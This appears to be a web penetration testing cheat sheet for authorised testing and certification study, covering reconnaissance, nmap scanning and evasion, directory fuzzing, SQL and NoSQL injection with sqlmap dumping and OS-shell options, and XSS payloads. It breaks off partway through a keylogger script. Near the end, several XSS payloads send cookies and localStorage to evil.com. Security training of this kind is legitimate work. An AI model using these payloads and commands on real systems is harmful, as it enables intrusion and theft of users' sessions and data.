- Introduction
- Legal & Ethical Considerations
- Penetration Testing Methodology
- Initial Setup & Installation
- Reconnaissance (Information Gathering)
- Port & Service Scanning
- Web Enumeration
- Vulnerability Assessment
- SQL Injection (SQLi)
- Cross-Site Scripting (XSS)
- Authentication Attacks
- File Inclusion Vulnerabilities
- Server-Side Request Forgery (SSRF)
- Command Injection
- API Testing
- SSL/TLS Security
- Post-Exploitation
- Reporting
- Tools Reference
- Practice Labs & Resources
- Sample Scripts
Web penetration testing is the practice of simulating cyberattacks against web applications to identify security vulnerabilities before malicious actors can exploit them. This comprehensive guide covers everything from initial reconnaissance to post-exploitation and reporting.
Whether you're preparing for certifications like OSCP, CEH, or GWAPT, or you're a security professional looking to expand your skills, this cheat sheet provides practical commands, techniques, and real-world examples.
Penetration testing without explicit written permission is ILLEGAL in most jurisdictions:
- USA: Computer Fraud and Abuse Act (CFAA)
- UK: Computer Misuse Act 1990
- EU: General Data Protection Regulation (GDPR) and local cybercrime laws
- Australia: Cybercrime Act 2001
-
Signed Authorization Letter - Must specify:
- Target scope (IP ranges, domains, applications)
- Testing dates and times
- Allowed testing methods
- Emergency contact information
- Legal jurisdiction and liability clauses
-
Rules of Engagement Document covering:
- What constitutes out-of-scope activity
- Data handling procedures
- Notification thresholds for critical findings
- Third-party considerations
-
Insurance & Professional Indemnity (for professional testers)
- OSCP (Offensive Security) - Hands-on penetration testing
- OSWP (Offensive Security Wireless Professional)
- OSWE (Offensive Security Web Expert)
- CEH (EC-Council) - Certified Ethical Hacker
- eWPT/X (eLearnSecurity) - Web penetration tester
- PNPT (TCM Security) - Practical Network Penetration Tester
- BSCP (PortSwigger) - Burp Suite Certified Practitioner
- GWAPT (GIAC) - Web Application Penetration Tester
- CISSP (ISC²) - Security management (requires experience)
| Phase | Name | Key Activities (Detailed) | Deliverables |
|---|---|---|---|
| 1 | Planning | • Define scope (IPs, domains, applications, APIs) • Identify in-scope / out-of-scope assets • Establish Rules of Engagement (RoE) • Obtain legal authorization & NDA • Determine testing methodology (e.g., OWASP Testing Guide, PTES) • Identify stakeholders & communication channels • Set testing timeline and escalation procedures • Define success criteria & reporting format |
Signed contract, scope document |
| 2 | Reconnaissance | • Passive OSINT (WHOIS, social media, breach databases) • Identify employee emails & technology stack • DNS enumeration & zone transfer attempts • Subdomain discovery (bruteforce + certificate transparency logs) • Search engine reconnaissance (Google dorking) • Metadata extraction from public documents • Identify third-party integrations & cloud services • Gather leaked credentials from public sources |
Target profile, attack surface map |
| 3 | Scanning | • Network discovery (live host identification) • TCP/UDP port scanning • Service version detection & banner grabbing • OS fingerprinting • SSL/TLS configuration analysis • Firewall/WAF detection • Vulnerability scanning using automated tools • Identify misconfigurations (open S3 buckets, exposed databases) |
Network map, open ports, services |
| 4 | Enumeration | • Directory and file brute-forcing • API endpoint discovery • Parameter fuzzing & input testing • User account enumeration (login, password reset) • SMB/LDAP enumeration • Database fingerprinting • Identify hidden functionality in JavaScript files • Review robots.txt & sitemap.xml |
Content inventory, potential entry points |
| 5 | Vulnerability Assessment | • Automated vulnerability scanning • Manual verification of findings • CVE & exploit database research • Misconfiguration analysis • Authentication & authorization testing • Business logic testing • Rate limiting & brute-force testing • Map vulnerabilities to CVSS scoring • Prioritize risks (Critical, High, Medium, Low) |
Vulnerability list, risk ratings |
| 6 | Exploitation | • Develop proof-of-concept (PoC) exploits • Exploit web vulnerabilities (SQLi, XSS, RCE, SSRF) • Password attacks (brute-force, credential stuffing) • Privilege escalation (local & domain level) • Exploit known CVEs • Gain shell access (reverse shell, web shell) • Bypass WAF/IDS mechanisms • Data extraction under controlled conditions |
Exploited vulnerabilities, access gained |
| 7 | Post-Exploitation | • Establish persistence mechanisms • Lateral movement across network • Token impersonation & pass-the-hash attacks • Dump credentials & password hashes • Sensitive data discovery (PII, financial data) • Privilege escalation to domain admin • Simulate data exfiltration • Log analysis & detection evasion techniques • Assess business impact of compromise |
Compromised systems, sensitive data |
| 8 | Reporting | • Document technical findings with evidence (screenshots, logs) • Risk severity classification & impact analysis • Business risk explanation for executives • Remediation & mitigation recommendations • Re-test verification (if required) • Executive summary (non-technical) • Technical appendix with reproduction steps • Final presentation to stakeholders |
Final report, presentation |
- Black Box: No prior knowledge of the system
- White Box: Full access to source code, architecture, credentials
- Grey Box: Partial knowledge (e.g., authenticated access)
- Blind Testing: Tester knows target, target doesn't know tester
- Double-Blind: Neither side knows about the test
- Red Team: Full-scope adversarial simulation
- Purple Team: Collaborative testing with defensive teams
Option 1: Virtual Machine (Recommended)
# Download Kali Linux VM from official site
# Import into VirtualBox/VMware
# Default credentials: kali:kaliOption 2: Bare Metal
# Download ISO from kali.org
# Create bootable USB: dd if=kali.iso of=/dev/sdb bs=4M status=progress
# Boot and installOption 3: Docker
docker pull kalilinux/kali-rolling
docker run -it kalilinux/kali-rolling /bin/bashOption 4: Windows Subsystem for Linux (WSL2)
# Install WSL2, then:
wsl --install -d kali-linux# Update package lists
sudo apt update && sudo apt upgrade -y
# Core scanning tools
sudo apt install -y nmap nikto gobuster dirb wfuzz
# Web application tools
sudo apt install -y sqlmap burpsuite zaproxy
# Brute force tools
sudo apt install -y hydra medusa john hashcat
# Enumeration tools
sudo apt install -y ffuf wfuzz whatweb wafw00f
# Reconnaissance tools
sudo apt install -y sublist3r amass theharvester dnsrecon
# Exploitation framework
sudo apt install -y metasploit-framework
# Networking tools
sudo apt install -y netcat-openbsd socat wireshark tcpdump
# Post-exploitation
sudo apt install -y impacket-scripts pwncat
# Wordlists
sudo apt install -y seclists wordlists# Install pip if not present
sudo apt install -y python3-pip
# Python-based tools
pip3 install theHarvester dalfox xsstrike
pip3 install impacket pwncat-cs
pip3 install dnspython requests beautifulsoup4
pip3 install shodan censys
pip3 install argon2 python-nmap# Create organized workspace
mkdir -p ~/pentest/{tools,wordlists,scripts,reports,loot}
# Create target-specific directories
mkdir -p ~/pentest/$(date +%Y%m%d)_target/{recon,scans,exploit,evidence}
cd ~/pentest/$(date +%Y%m%d)_target# Add to ~/.bashrc for persistence
export TARGET="10.10.10.1"
export DOMAIN="target.com"
export LHOST=$(ip a | grep tun0 | awk '{print $2}' | cut -d/ -f1)
export WORDLIST="/usr/share/wordlists/rockyou.txt"
# Source the file
source ~/.bashrc-
Proxy Setup:
- Browser → Settings → Network → Manual proxy:
127.0.0.1:8080 - Install Burp CA certificate
- Firefox: Preferences → Privacy & Security → Certificates → Import
- Browser → Settings → Network → Manual proxy:
-
FoxyProxy browser extension for quick proxy switching
-
Scope Configuration:
- Target tab → Scope → Add to scope
- Exclude out-of-scope items
# Add target domains for easier access
sudo tee -a /etc/hosts << EOF
10.10.10.1 target.htb dev.target.htb admin.target.htb
10.10.10.2 mail.target.htb vpn.target.htb
EOF# WHOIS information
whois target.com
# All DNS records
dig target.com ANY +noall +answer
nslookup -type=ANY target.com
# MX records (mail servers)
dig target.com MX +short
nslookup -type=MX target.com
# NS records (name servers)
dig target.com NS +short
host -t ns target.com
# TXT records (SPF, DKIM, verification)
dig target.com TXT +short
nslookup -type=TXT target.com
# A/AAAA records
dig target.com A +short
dig target.com AAAA +short
# CNAME records
dig www.target.com CNAME +short
# SOA record (start of authority)
dig target.com SOA +short# Attempt zone transfer from each name server
for ns in $(dig NS target.com +short); do
echo "Attempting zone transfer from $ns"
dig AXFR target.com @$ns
done
# Using host command
host -l target.com ns1.target.com# Find domains hosted on IP
dig -x 192.168.1.1 +short
nslookup 192.168.1.1# Sublist3r - Multiple sources
sublist3r -d target.com -o subdomains.txt
sublist3r -d target.com -b google,yahoo,bing,baidu -t 50
# Amass - Passive mode
amass enum -passive -d target.com -o amass_passive.txt
# TheHarvester - Search engines
theHarvester -d target.com -b all -f theharvester.html
# Certificate Transparency (crt.sh)
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq .
# Using SecurityTrails API
curl -s "https://api.securitytrails.com/v1/domain/target.com/subdomains" \
-H "APIKEY: YOUR_API_KEY" | jq -r '.subdomains[]'
# Shodan
shodan search hostname:target.com# Amass - Active enumeration
amass enum -active -d target.com -o amass_active.txt
amass enum -active -d target.com -brute -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
# Gobuster DNS mode
gobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 50
# ffuf for vhost discovery
ffuf -u http://target.com -H "Host: FUZZ.target.com" \
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-fc 400,404,403
# DNSRecon
dnsrecon -d target.com -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t brt
# DNSEnum
dnsenum target.com# WhatWeb - Comprehensive
whatweb target.com
whatweb target.com --aggression 3 --log-brief=whatweb.txt
# Wappalyzer (browser extension)
# BuiltWith (online service)
# Wafw00f - WAF detection
wafw00f target.com
wafw00f target.com -a # aggressive
# HTTP headers inspection
curl -sI https://target.com
curl -sI https://target.com | grep -i "server\|x-powered-by\|via"
# Web server fingerprinting
httpx -u target.com -tech-detect -status-code -title -follow-redirects
# CMS detection
# WordPress
wpscan --url target.com --api-token YOUR_TOKEN
# Joomla
joomscan -u target.com
# Drupal
droopescan scan drupal -u target.com# theHarvester
theHarvester -d target.com -b all -f results.html
theHarvester -d target.com -b google,bing,linkedin
# Hunter.io (API required)
curl -s "https://api.hunter.io/v2/domain-search?domain=target.com&api_key=KEY" | jq
# EmailHarvester
python3 EmailHarvester.py -d target.com- LinkedIn: Search for employees, job postings, technologies used
- Twitter: Company handles, employee mentions
- GitHub: Search for company repos, code leaks, API keys
- Glassdoor: Employee reviews, technologies mentioned
# GitHub dorks
site:github.com "target.com"
site:github.com "target.com" "api_key"
site:github.com "target.com" "password"
# Gitrob (requires GitHub token)
gitrob -target target.com
# TruffleHog - find secrets
trufflehog github --org=target-org# View historical versions
waybackurls target.com | tee wayback_urls.txt
# Extract endpoints
gau target.com | tee gau_urls.txt# Common dorks
site:target.com
site:target.com filetype:pdf
site:target.com inurl:admin
site:target.com intitle:"index of"
site:target.com ext:php | ext:asp | ext:aspx | ext:jsp
site:target.com inurl:wp-content
site:target.com "confidential" | "internal use only"
site:target.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near"
site:target.com inurl:php? id=
site:target.com "powered by" | "built with"
# Find cloud assets
# AWS
curl -s http://target.com.s3.amazonaws.com
curl -s http://s3.amazonaws.com/target.com
# Azure
curl -s http://target.com.blob.core.windows.net
# Google Cloud
curl -s http://storage.googleapis.com/target.com
# Shodan queries
shodan search "hostname:target.com" --fields ip_str,port,org,hostnames
shodan search "ssl:target.com" --fields ip_str,port
shodan search "http.title:target" --fields ip_str,port
# Censys
censys search "target.com"# Quick scan (top 1000 ports)
nmap -T4 -F target.com
# Version detection
nmap -sV target.com
# OS detection
nmap -O target.com
# Default scripts
nmap -sC target.com
# Combined: version + scripts
nmap -sV -sC target.com
# Aggressive scan (OS + version + scripts + traceroute)
nmap -A -T4 target.com# Specific ports
nmap -p 80,443,8080,8443 target.com
# Port range
nmap -p 1-1000 target.com
# All ports (65535) - slow
nmap -p- target.com
# Fast all ports (with rate limiting)
nmap -p- --min-rate 5000 target.com
# Most common ports
nmap --top-ports 200 target.com# TCP SYN scan (default, requires root)
sudo nmap -sS target.com
# TCP Connect scan (no root)
nmap -sT target.com
# UDP scan
sudo nmap -sU target.com
sudo nmap -sU --top-ports 50 target.com
# FIN scan (bypass some firewalls)
sudo nmap -sF target.com
# NULL scan
sudo nmap -sN target.com
# Xmas scan
sudo nmap -sX target.com
# ACK scan (map firewall rules)
sudo nmap -sA target.com
# Window scan
sudo nmap -sW target.com
# Maimon scan
sudo nmap -sM target.com# Normal output
nmap -oN scan.txt target.com
# XML output (for tools)
nmap -oX scan.xml target.com
# Grepable output
nmap -oG scan.gnmap target.com
# All formats
nmap -oA scan target.com# Timing templates
# T0 = Paranoid, T1 = Sneaky, T2 = Polite, T3 = Normal, T4 = Aggressive, T5 = Insane
nmap -T4 target.com
# Host timeout
nmap --host-timeout 30m target.com
# Max retries
nmap --max-retries 3 target.com
# Min/max rate
nmap --min-rate 100 --max-rate 500 target.com
# Parallelism
nmap --min-hostgroup 50 --max-hostgroup 100 target.com# Fragment packets
sudo nmap -f target.com
# Specify MTU (must be multiple of 8)
sudo nmap --mtu 16 target.com
# Decoy scans
sudo nmap -D RND:10 target.com
sudo nmap -D decoy1,decoy2,ME target.com
# Spoof source port
sudo nmap --source-port 53 target.com
# Randomize hosts
sudo nmap --randomize-hosts target.com
# MAC address spoofing
sudo nmap --spoof-mac Apple target.com
sudo nmap --spoof-mac 00:11:22:33:44:55 target.com
# Idle scan (zombie)
sudo nmap -sI zombie_host target.com# Run all safe scripts
nmap -sV --script safe target.com
# Run vulnerability scripts
nmap -sV --script vuln target.com
# Run exploit scripts
nmap --script exploit target.com
# Run specific category
nmap --script default,auth,discovery target.com
# Run specific script
nmap --script http-enum target.com
nmap --script http-title target.com
nmap --script dns-brute target.com
# Script with arguments
nmap --script http-brute --script-args userdb=users.txt,passdb=pass.txt target.com
# HTTP enumeration
nmap -p 80,443,8080,8443 --script http-enum,http-headers,http-title,http-server-header target.com
# SMB enumeration
nmap -p 445 --script smb-enum-shares,smb-enum-users,smb-os-discovery target.com# HTTP vuln scanning
nmap -p 80,443 --script http-vuln-* target.com
# SQL injection detection
nmap -p 80 --script http-sql-injection target.com
# XSS detection
nmap -p 80 --script http-unsafe-output-escaping target.com
# Shellshock detection
nmap -p 80 --script http-shellshock target.com
# Heartbleed detection
nmap -p 443 --script ssl-heartbleed target.com
# DNS zone transfer
nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=target.com target.com
# SSL/TLS enumeration
nmap -p 443 --script ssl-enum-ciphers target.com
nmap -p 443 --script ssl-cert target.com
# FTP enumeration
nmap -p 21 --script ftp-anon,ftp-brute,ftp-syst target.com
# SSH enumeration
nmap -p 22 --script ssh2-enum-algos,ssh-hostkey,ssh-auth-methods target.com#!/bin/bash
# Complete Nmap scanning workflow
TARGET="10.10.10.1"
OUTDIR="./nmap_scan_$(date +%Y%m%d_%H%M%S)"
mkdir -p $OUTDIR
echo "[*] Starting Nmap scan against $TARGET"
echo "[*] Output directory: $OUTDIR"
# Phase 1: Quick port scan
echo "[*] Phase 1: Quick top-1000 port scan"
nmap -T4 --open -oN $OUTDIR/quick.txt $TARGET
# Phase 2: Full port scan (all ports)
echo "[*] Phase 2: Full port scan (all 65535)"
nmap -p- -T4 --min-rate 5000 -oN $OUTDIR/allports.txt $TARGET
# Extract open ports
PORTS=$(grep ^[0-9] $OUTDIR/allports.txt | cut -d'/' -f1 | tr '\n' ',' | sed 's/,$//')
echo "[+] Open ports: $PORTS"
# Phase 3: Service and version detection
echo "[*] Phase 3: Service and version detection"
nmap -p $PORTS -sV -sC -A -oN $OUTDIR/services.txt -oX $OUTDIR/services.xml $TARGET
# Phase 4: Vulnerability scan
echo "[*] Phase 4: Vulnerability scan with NSE"
nmap -p $PORTS --script vuln -oN $OUTDIR/vuln.txt $TARGET
# Phase 5: Safe script scan
echo "[*] Phase 5: Safe script scan"
nmap -p $PORTS --script safe -oN $OUTDIR/safe_scripts.txt $TARGET
# Phase 6: UDP scan (top 100 ports)
echo "[*] Phase 6: UDP scan (top 100 ports)"
sudo nmap -sU --top-ports 100 -oN $OUTDIR/udp.txt $TARGET
echo "[+] Scan complete! Results in $OUTDIR"# Directory enumeration
gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
# With extensions
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -x php,asp,aspx,jsp,html,txt,bak,zip,sql
# Status codes
gobuster dir -u https://target.com -w wordlist.txt -s 200,204,301,302,307,403
# Exclude status codes
gobuster dir -u https://target.com -w wordlist.txt -b 404,403
# Follow redirects
gobuster dir -u https://target.com -w wordlist.txt -r
# Cookies and headers
gobuster dir -u https://target.com -w wordlist.txt -c "session=abc123"
gobuster dir -u https://target.com -w wordlist.txt -H "Authorization: Bearer token"
# DNS subdomain enumeration
gobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50
# VHost enumeration
gobuster vhost -u https://target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50# Basic directory fuzzing
ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt
# With extensions
ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt -e .php,.asp,.aspx,.jsp,.html,.txt
# Filter by status codes
ffuf -u https://target.com/FUZZ -w wordlist.txt -fc 404,403
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,204,301,302
# Filter by response size
ffuf -u https://target.com/FUZZ -w wordlist.txt -fs 0
ffuf -u https://target.com/FUZZ -w wordlist.txt -fw 0
ffuf -u https://target.com/FUZZ -w wordlist.txt -fl 0
# Recursive scanning
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2
# POST request fuzzing
ffuf -u https://target.com/login -X POST -d "username=FUZZ&password=test" -H "Content-Type: application/x-www-form-urlencoded" -w usernames.txt -fc 401
# Header fuzzing
ffuf -u https://target.com -H "Host: FUZZ.target.com" -w subdomains.txt -fc 400,404
# Parameter fuzzing
ffuf -u https://target.com/page?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fc 404
# Cookie fuzzing
ffuf -u https://target.com -b "session=FUZZ" -w wordlist.txt -fc 302
# Multiple FUZZ points
ffuf -u https://target.com/FUZZ1?param=FUZZ2 -w FUZZ1:dirs.txt -w FUZZ2:params.txt# Basic scan
dirb https://target.com
# With custom wordlist
dirb https://target.com /usr/share/wordlists/dirb/big.txt
# With extensions
dirb https://target.com -X .php,.html,.txt
# Non-recursive
dirb https://target.com -r
# Use cookies
dirb https://target.com -c "session=abc123"
# Use proxy
dirb https://target.com -p 127.0.0.1:8080# Directory scanning
wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hc 404 https://target.com/FUZZ
# File extensions
wfuzz -c -z file,wordlist.txt -z list,php-asp-jsp https://target.com/FUZZ.FUZ2Z
# POST parameter fuzzing
wfuzz -c -z file,usernames.txt -d "username=FUZZ&password=test" https://target.com/login
# Cookie fuzzing
wfuzz -c -z file,sessions.txt -b "session=FUZZ" https://target.com/dashboard
# Header injection
wfuzz -c -z file,headers.txt -H "FUZZ: test" https://target.com# Basic scan
nikto -h https://target.com
# Specific port
nikto -h https://target.com -p 8443
# With authentication
nikto -h https://target.com -id admin:password
# SSL/TLS specific
nikto -h https://target.com -ssl
# Save output
nikto -h https://target.com -o nikto_scan.txt
# Tuning (select specific tests)
nikto -h https://target.com -Tuning 123456
# 1=File Upload, 2=Misconfig, 3=Info Disclosure, 4=Injection, 5=RFI/LFI, 6=XSS, 7=Command Exec, 8=SQLi, 9=SQL Injection
# Use proxy
nikto -h https://target.com -useproxy http://127.0.0.1:8080
# Evasion techniques
nikto -h https://target.com -evasion 123
# 1=Random URI, 2=Directory prepend, 3=Prepend long random string, 4=Parameter/Value, 5=Tab separation, 6=Change case, 7=Windows paths# Basic detection
whatweb https://target.com
# Aggressive mode
whatweb https://target.com -a 3
# Verbose output
whatweb https://target.com -v
# Log output
whatweb https://target.com --log-brief=whatweb.txt
whatweb https://target.com --log-json=whatweb.json
whatweb https://target.com --log-sql=whatweb.sql
# Multiple targets
whatweb --input-file=targets.txt# Basic scan
wpscan --url https://target.com
# Enumerate plugins
wpscan --url https://target.com --enumerate p
# Enumerate themes
wpscan --url https://target.com --enumerate t
# Enumerate users
wpscan --url https://target.com --enumerate u
# Enumerate vulnerable plugins/themes
wpscan --url https://target.com --enumerate vp,vt
# API token for vulnerability database
wpscan --url https://target.com --api-token YOUR_TOKEN
# Password brute force
wpscan --url https://target.com --passwords rockyou.txt --usernames admin
# WAF detection
wpscan --url https://target.com --detection-mode aggressive
# Multisite scan
wpscan --url https://target.com --multisite# Joomscan
joomscan -u https://target.com
# Joomla vulnerability scanner
python3 joomla-brute.py -u https://target.com -w passwords.txt -usr admin# Droopescan
droopescan scan drupal -u https://target.com
# Drupalgeddon2
python3 drupalgeddon2.py -u https://target.com# MageScan
python2 magento-scan.py -u https://target.com# Using ffuf
ffuf -u http://target.com -H "Host: FUZZ.target.com" -w subdomains.txt -fs 1234
# Using gobuster
gobuster vhost -u http://target.com -w subdomains.txt
# Using wfuzz
wfuzz -c -z file,subdomains.txt -H "Host: FUZZ.target.com" -u http://target.com -hc 400,404
# Manual with curl
for sub in $(cat subdomains.txt); do
curl -s -H "Host: $sub.target.com" http://target.com | grep -q "Welcome" && echo "Found: $sub"
done# Common API paths
ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt
# API version fuzzing
ffuf -u https://target.com/api/vFUZZ -w "1-10" -fc 404
# Swagger/OpenAPI discovery
ffuf -u https://target.com/FUZZ -w <(echo -e "swagger.json\nswagger.yaml\nopenapi.json\napi-docs")
# GraphQL discovery
ffuf -u https://target.com/FUZZ -w <(echo -e "graphql\ngraphiql\ngraphql/console\ngraphql/graphiql")# Check robots.txt
curl -s https://target.com/robots.txt
# Check sitemap
curl -s https://target.com/sitemap.xml
curl -s https://target.com/sitemap_index.xml
# Extract disallowed paths
curl -s https://target.com/robots.txt | grep "Disallow" | awk '{print $2}'
# Extract sitemap URLs
curl -s https://target.com/sitemap.xml | grep -o "<loc>[^<]*" | sed 's/<loc>//g'# Download all JS files
wget -r -l1 -A.js https://target.com
# Extract endpoints from JS
cat *.js | grep -Eo "https?://[^/\\\"']+" | sort -u
cat *.js | grep -Eo "/[a-zA-Z0-9_\-/]+\.(php|asp|aspx|jsp)" | sort -u
# LinkFinder
python3 LinkFinder.py -i https://target.com -o cli
# JSParser (for async endpoints)
python2 JSParser.py https://target.com
# SecretFinder
python3 SecretFinder.py -i https://target.com -o cli# Get all historical URLs
waybackurls target.com | tee wayback_urls.txt
# Gau (Get All URLs)
gau target.com | tee gau_urls.txt
# Filter interesting endpoints
cat wayback_urls.txt | grep -E "\.php|\?|\.asp|\.aspx|\.jsp|api|admin|login"
# Check for parameters
cat wayback_urls.txt | grep "=" | sort -u# Basic scan
nuclei -u https://target.com
# With templates
nuclei -u https://target.com -t cves/
nuclei -u https://target.com -t exposures/
nuclei -u https://target.com -t misconfiguration/
# Severity-based
nuclei -u https://target.com -severity critical,high
# Multiple targets
nuclei -l targets.txt
# Output formats
nuclei -u https://target.com -o results.txt -json
# Rate limiting
nuclei -u https://target.com -rl 150 -bs 25 -c 25# CLI usage
nessuscli scan new --name "Web Scan" --targets target.com --policy "Web App Tests"
nessuscli scan launch --scan-id 123
nessuscli report download --scan-id 123 --format html# Start services
sudo gvm-start
# CLI scan creation
gvm-cli --gmp-username admin --gmp-password pass socket --socketpath /var/run/gvmd.sock --xml "<create_task>...</create_task>"# Check security headers
curl -sI https://target.com | grep -iE "strict-transport-security|content-security-policy|x-frame-options|x-content-type-options|referrer-policy|permissions-policy"
# Using online tools
# securityheaders.com
# observatory.mozilla.org# Check for debug pages
curl -s https://target.com/phpinfo.php
curl -s https://target.com/info
curl -s https://target.com/server-status
# Check for version disclosure
curl -sI https://target.com | grep -i "server\|x-powered-by"
curl -s https://target.com | grep -i "generator\|version"
# Check for error messages
curl -s "https://target.com/page?id='" | grep -i "sql\|error\|warning"# Test with origin header
curl -sI https://target.com -H "Origin: https://evil.com" | grep -i "access-control-allow-origin"
# Test with null origin
curl -sI https://target.com -H "Origin: null" | grep -i "access-control-allow-origin"# Check allowed methods
curl -sI https://target.com -X OPTIONS | grep -i "allow"
# Test dangerous methods
curl -X PUT -d "test" https://target.com/test.txt
curl -X DELETE https://target.com/test.txt
curl -X TRACE https://target.com# Basic payloads
' OR '1'='1
' OR 1=1--
" OR "1"="1
1' AND '1'='1
1' AND '1'='2
' OR '1'='1' --
# Comments
'--
'#
'/*
'
--
#
# Union-based detection
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
# Boolean-based
' AND 1=1--
' AND 1=2--
# Time-based
' AND SLEEP(5)--
' WAITFOR DELAY '00:00:05'--
' AND 1=1 AND SLEEP(5)--# Basic detection
sqlmap -u "https://target.com/page?id=1"
# POST request
sqlmap -u "https://target.com/login" --data="username=admin&password=test"
# From Burp request file
sqlmap -r request.txt
# With cookie
sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123"
# Level and risk
sqlmap -u "https://target.com/page?id=1" --level=5 --risk=3
# Random user agent
sqlmap -u "https://target.com/page?id=1" --random-agent
# Batch mode (no prompts)
sqlmap -u "https://target.com/page?id=1" --batch
# Force SSL
sqlmap -u "https://target.com/page?id=1" --force-ssl# Get databases
sqlmap -u "https://target.com/page?id=1" --dbs
# Get current database
sqlmap -u "https://target.com/page?id=1" --current-db
# Get current user
sqlmap -u "https://target.com/page?id=1" --current-user
# Get database users
sqlmap -u "https://target.com/page?id=1" --users
# Get database privileges
sqlmap -u "https://target.com/page?id=1" --privileges# Get tables from database
sqlmap -u "https://target.com/page?id=1" -D database_name --tables
# Get columns from table
sqlmap -u "https://target.com/page?id=1" -D database_name -T users --columns
# Dump table data
sqlmap -u "https://target.com/page?id=1" -D database_name -T users --dump
# Dump specific columns
sqlmap -u "https://target.com/page?id=1" -D database_name -T users -C username,password --dump
# Conditional dump
sqlmap -u "https://target.com/page?id=1" -D database_name -T users --dump --where="id=1"# Tamper scripts
sqlmap -u "https://target.com/page?id=1" --tamper=space2comment
sqlmap -u "https://target.com/page?id=1" --tamper=between,randomcase
sqlmap -u "https://target.com/page?id=1" --tamper=apostrophemask,apostrophenullencode
# List all tamper scripts
sqlmap --list-tampers
# WAF bypass
sqlmap -u "https://target.com/page?id=1" --tamper=space2comment --random-agent --flush-session
# No-cast
sqlmap -u "https://target.com/page?id=1" --no-cast
# Hex conversion
sqlmap -u "https://target.com/page?id=1" --hex# Read file
sqlmap -u "https://target.com/page?id=1" --file-read=/etc/passwd
# Write file
sqlmap -u "https://target.com/page?id=1" --file-write=shell.php --file-dest=/var/www/html/shell.php
# Check privileges
sqlmap -u "https://target.com/page?id=1" --is-dba# Get OS shell
sqlmap -u "https://target.com/page?id=1" --os-shell
# Execute command
sqlmap -u "https://target.com/page?id=1" --os-cmd="id"
# SQL shell
sqlmap -u "https://target.com/page?id=1" --sql-shelladmin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
' UNION SELECT 1, 'admin', 'password'--' UNION SELECT null, null, null--
' UNION SELECT 1,2,3--
' UNION SELECT 1,@@version,3--
' UNION SELECT 1,table_name,3 FROM information_schema.tables--
' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--' AND extractvalue(1, concat(0x7e, database()))--
' AND updatexml(1, concat(0x7e, database()), 1)--
' AND (SELECT * FROM(SELECT COUNT(*),CONCAT(database(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--' AND 1=1--
' AND 1=2--
' AND SUBSTRING(database(),1,1)='a'--
' AND ASCII(SUBSTRING(database(),1,1)) > 100--' AND SLEEP(5)--
' AND BENCHMARK(10000000,MD5('a'))--
' WAITFOR DELAY '00:00:05'--
' AND 1=(SELECT COUNT(*) FROM sysobjects WHERE xtype='U' AND WAITFOR DELAY '00:00:05')--# Register with malicious payload
sqlmap -u "https://target.com/register" --data="username=admin'--&password=test"
# Trigger on another page
sqlmap -u "https://target.com/profile" --cookie="session=abc123" --second-url="https://target.com/profile"// MongoDB
' || '1'=='1
' || 1==1//
' && this.password.match(/.*/)//
' && this.username.match(/admin/)//
// Authentication bypass
{ "username": { "$ne": null }, "password": { "$ne": null } }
{ "username": { "$regex": "admin" }, "password": { "$regex": "^.*" } }
// Tools
# NoSQLMap
nosqlmap.py --target http://target.com --attack<!-- Basic payload -->
<script>alert('XSS')</script>
<!-- URL parameter -->
https://target.com/search?q=<script>alert(1)</script>
<!-- Form input -->
<input type="text" value="<script>alert(1)</script>"><!-- Comment section -->
<script>alert(document.cookie)</script>
<!-- Profile field -->
<img src=x onerror="fetch('https://evil.com/steal?cookie='+document.cookie)">
<!-- Message board -->
<svg onload=alert(1)>// URL fragment
https://target.com/#<script>alert(1)</script>
// document.write
document.write(location.hash.substring(1))
// innerHTML
element.innerHTML = location.hash.substring(1)
// eval
eval(location.hash.substring(1))<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert(document.cookie)</script>
<script>alert(document.domain)</script>
<script>alert(document.URL)</script><img src=x onerror=alert(1)>
<img src=x onload=alert(1)>
<body onload=alert(1)>
<div onmouseover=alert(1)>Hover me</div>
<input onfocus=alert(1) autofocus>
<svg onload=alert(1)>
<iframe onload=alert(1)>"><script>alert(1)</script>
'><script>alert(1)</script>
javascript:alert(1)
"><img src=x onerror=alert(1)>
' onmouseover=alert(1) '%3Cscript%3Ealert(1)%3C/script%3E
<script>alert(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt>
<ScRiPt>alert(1)</ScRiPt>javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
" onclick=alert(1)//<button ' onclick=alert(1)'>Click<!-- Send cookie to attacker -->
<script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>
<script>new Image().src='https://evil.com/steal?c='+document.cookie</script>
<script>document.location='https://evil.com/steal?c='+document.cookie</script>
<!-- With credentials -->
<script>fetch('https://evil.com/steal', {method:'POST', body:document.cookie, mode:'no-cors'})</script>
<!-- Steal local storage -->
<script>fetch('https://evil.com/steal?data='+btoa(JSON.stringify(localStorage)))</script><script>
document.onkeypress = function(e) {
